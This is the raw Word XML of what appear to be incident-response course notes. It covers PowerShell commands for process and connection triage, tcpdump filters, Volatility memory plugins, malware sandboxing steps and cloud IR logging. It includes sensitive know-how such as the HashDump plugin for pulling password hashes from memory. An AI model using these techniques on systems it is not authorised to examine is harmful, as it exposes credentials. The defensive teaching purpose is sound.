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Sample accident: Argous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Victim’s name is Argous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r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Argous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were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AssetMgtAcct.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Even after killing the 2 processes found on the CRM server, Office Remoter (the proxy) and Ofice_techneter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72FDA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>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772FDA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>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‘powersh*’ : Get brief information about a named process with a wildcard.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2446F2F7" w14:textId="33C18F01"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‘powershell’ |Select-Object * : Detailed information.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C7B83FD" w14:textId="2A14F1D7"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-ComputerName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Get-CimInstance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Get-CimInstance</w:t>
            </w:r>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PS C: \Users\Sec504&gt; Get-CimInstance -Class Win32_Process | Where-Object -Property ParentProcessID -EQ 644</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F3DEC92" w14:textId="06397B8F"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Get-CimInstance -Class Win32_Process |</w:t>
            </w:r>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> : Returns an object with Windows process information, start the PowerShell pipeline with |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6645CABA" w14:textId="59C9C826"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Where-Object :</w:t>
            </w:r>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Start a loop examining each process returned by Get-CimInstance.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D104BFF" w14:textId="5E3EDD49"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-Property ParentProcessID :</w:t>
            </w:r>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Create a filtering expression based on the ParentProcessID property value.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52AF4413" w14:textId="4C3355F8"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-EQ 644 :</w:t>
            </w:r>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Display process where the ParentProcessId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r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>EncodedCommand</w:t>
            </w:r>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-EncodedCommand to specify the content of a script. Note that not every -EncodedCommand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r w:rsidR="004D6C2F" w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>NetTCPConnection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Get-NetTCPConnection</w:t>
            </w:r>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772FDA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>From incident, or other processes/ connections ( i.e.,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Get-CimInstance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Get-CimInstance</w:t>
            </w:r>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-ClassName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Get-ChildItem</w:t>
            </w:r>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Get-ItemProperty</w:t>
            </w:r>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Get-ChildItem</w:t>
            </w:r>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Get-ItemProperty</w:t>
            </w:r>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Get-LocalUser</w:t>
            </w:r>
            <w:r w:rsidR="00F82307" w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>Get-LocalGroup</w:t>
            </w:r>
            <w:r w:rsidR="00F82307" w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>Get-LocalGroupMember</w:t>
            </w:r>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Get-ScheduledTask</w:t>
            </w:r>
            <w:r w:rsidR="009D33DB" w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> : Look for unusual scheduled tasks.</w:t>
            </w:r>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>Get-ScheduledTaskInfo</w:t>
            </w:r>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Export-ScheduledTask</w:t>
            </w:r>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Get-WinEvent</w:t>
            </w:r>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r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>FilterHashTable</w:t>
            </w:r>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network and process information in real time.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F3B4D92"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Sysmom</w:t>
            </w:r>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TCPView:</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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Procdump:</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772FDA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>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r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Pcapng: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Unix-like (Linux, macOS, BSD) Windows (windump)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CACCBD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772FDA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>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 xml:space="preserve">Tcpdump -i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-i interface -w file: Captures for an interface and write to a file.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="296FC56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Dir: the direction (src, dst)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7503845E"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Using and (and, &amp;&amp;) or (</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>or,</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> ||) and not (not, !)</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 : Traffic going or from host 8.8.8.8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25A2E6B6" w14:textId="7777777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 : Traffic coming from host 8.8.8.8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1046C56D" w14:textId="186E2031"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 : Traffic where the src is not 8.8.8.8.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A79D71A" w14:textId="7A938CF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 :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772FDA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>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Squid is a popular open-source web proxy other include, Blue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r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>WinPmem: capture RAM in Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6706045E"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Analyzing an image of RAM has become a staple of investigations</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CE2736C"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First, we need to collect memory (WinPmem)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4672D7F1"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772FDA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>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r w:rsidRPr="006F6673">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>windows.pslist.PsList</w:t>
            </w:r>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r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>windows.pstree.PsTree</w:t>
            </w:r>
            <w:r w:rsidR="00CE5136">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: this plugin lists the parent child </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00CE5136">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>relationship</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00CE5136">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">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r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>windows.netscan.NetScan</w:t>
            </w:r>
            <w:r w:rsidR="00CE5136">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: This plugin helps you investigate unexpected network listenners or connections. It is similar to the output of netstat, or Get-NetTCPconnection and Get-NetUDPEndpoint.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r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>windows.cmdline.CmdLine</w:t>
            </w:r>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r w:rsidRPr="002257B2">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>windows.dlllist.DllList</w:t>
            </w:r>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r w:rsidRPr="002257B2">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Windows.driverscan.DriverScan</w:t>
            </w:r>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r w:rsidRPr="002257B2">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Windows.envars.Envars</w:t>
            </w:r>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r w:rsidRPr="002257B2">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Windows.filescan.FileScan</w:t>
            </w:r>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r w:rsidRPr="002257B2">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Windows.dumpfiles.DumpFiles</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: Carve out files</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AD70A9D" w14:textId="77777777" w:rsidR="00606A5B" w:rsidRDefault="00606A5B" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002257B2">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Windows.info.Info</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: Examine Windows version information</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46AB559E" w14:textId="77777777" w:rsidR="00606A5B" w:rsidRDefault="00606A5B" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002257B2">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Windows.hashdump.HashDump</w:t>
            </w:r>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r w:rsidRPr="002257B2">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Windows.privileges.Privs</w:t>
            </w:r>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r w:rsidRPr="002257B2">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Windows.registry.hivelist.Hivelist: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r w:rsidRPr="002257B2">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Windows.registry.printkey.PrintKey</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: Access keys with - - offset</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07386325" w14:textId="77777777" w:rsidR="00606A5B" w:rsidRDefault="00606A5B" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002257B2">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Windows.registry.userassist.UserAssist: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r w:rsidRPr="002257B2">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows.registry.certificates.Certificates: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r w:rsidRPr="002257B2">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Windows.svscan.SvcScan</w:t>
            </w:r>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772FDA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>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Suspicious process? Start with PSList and PsTree</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DF151CC"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Suspicious network listener? Start with NetScan, the move to processes.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D1F7EF4" w14:textId="50F7C7E9"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Suspicious programs? Start with CmdLine,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Someone might have reverse engineered it already</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="276F9BC8"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But not always ..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r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>VirusTotal</w:t>
            </w:r>
            <w:r w:rsidR="00DE7794">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: will run a specimen through several antivirus engines, can you can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has sandboxes that run malware and record activity. Can choose if sample should be shared with community, and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More common to use a VM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D1674F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Get-FileHash</w:t>
            </w:r>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772FDA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>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772FDA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="37"/>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Run malware.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A418E0F" w14:textId="02436002"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772FDA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="37"/>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Take a snapshot before and after running the malware, and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r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Regshot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119"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added</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15740189"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removed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27B227AD"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shot</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58594D3D"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shot</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="159CEE47" w14:textId="57D21A43" w:rsidR="0040130C" w:rsidRPr="0040130C" w:rsidRDefault="0040130C" w:rsidP="00772FDA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="40"/>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r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Regshot Output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119"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Summarizing Process Monitor Output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119"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t>Basic summaries available under tools menu.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58E67450" w14:textId="42D27B5E" w:rsidR="00381AE9" w:rsidRPr="00381AE9" w:rsidRDefault="00381AE9" w:rsidP="00772FDA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="41"/>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F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="332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119"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paremeters.</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Optional decompiler (Hex-Rays)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="012BDDE6"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r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Ghidra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Open source, but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Complex technologies, rapidly changing</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="701B7C80" w14:textId="2A57E1DF"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772FDA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="44"/>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772FDA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="44"/>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4D992897" w14:textId="77777777" w:rsidR="00AE4150" w:rsidRDefault="00AE4150" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Conduct analysis in the cloud, matching the same region. Working where the data is will be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57390682" w14:textId="02B4C646" w:rsidR="00303D06" w:rsidRDefault="007725BA" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>For cloud systems, one of the major considerations for preparations is the configuration and deployment of logging systems. Important things to log.drtf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48431F4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F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="332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119"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 xml:space="preserve">y detection and threat hunting using the cloud data. Preserving the idea that cloud IR is best done in the cloud, it is also best practice that the logging information be reviewed on a continual basis using cloud-provider analysis tools, augmented </w:t>
            </w:r>
            <w:r w:rsidR="0002213E">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>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t>Threat detection uses endpoint data and cloud control plane data (API used to access cloud assets)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D8675AF"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GCP CloudArmor</w:t>
            </w:r>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After creating an image, you can export the image to block storage for later analysis or use block storage on a live system as a detachable storage entity.s</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EE727F8" w14:textId="48BA86ED" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>aws ec2 describe-volumes</w:t>
            </w:r>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>aws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Validate MFA (multi-factor authentication) for users</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E2D89CA" w14:textId="24543D6F"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Remediation is often not fun of incident response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772FDA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="51"/>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lastRenderedPageBreak/>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772FDA" w:rsidRPr="006F5A04" w14:paraId="0907788F" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0981A045" w14:textId="0E6A2F03" w:rsidR="00772FDA" w:rsidRPr="006F5A04" w:rsidRDefault="00772FDA" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CEE3675" w14:textId="22215228" w:rsidR="00772FDA" w:rsidRPr="006F5A04" w:rsidRDefault="00772FDA" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Is a highly intelligent individual who wants to explore technology to learn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69ABF39A" w14:textId="73598C1D" w:rsidR="00772FDA" w:rsidRPr="006F5A04" w:rsidRDefault="00772FDA" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04AD57A1" w14:textId="4D612E98" w:rsidR="00772FDA" w:rsidRPr="006F5A04" w:rsidRDefault="00772FDA"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30E0E3DB" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00772FDA" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Because they are widespread use right now, they provide us fundamental information about the principles the attackers employ.</w:t>
            </w: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90CBF14" w14:textId="77777777" w:rsidR="00303D06"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 xml:space="preserve">Full and documented permission is essential before you run any of these tools on a network. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E1650FB" w14:textId="77777777" w:rsidR="00422C1B"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When getting permission, it needs to be in writing.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65270EA8" w14:textId="6A7E5AC8" w:rsidR="00422C1B"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The documented permission should also state that the giver of permission understands there may be potentially adverse side effects of the scanning or testing activity.</w:t>
            </w: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561194C4" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="00375787" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
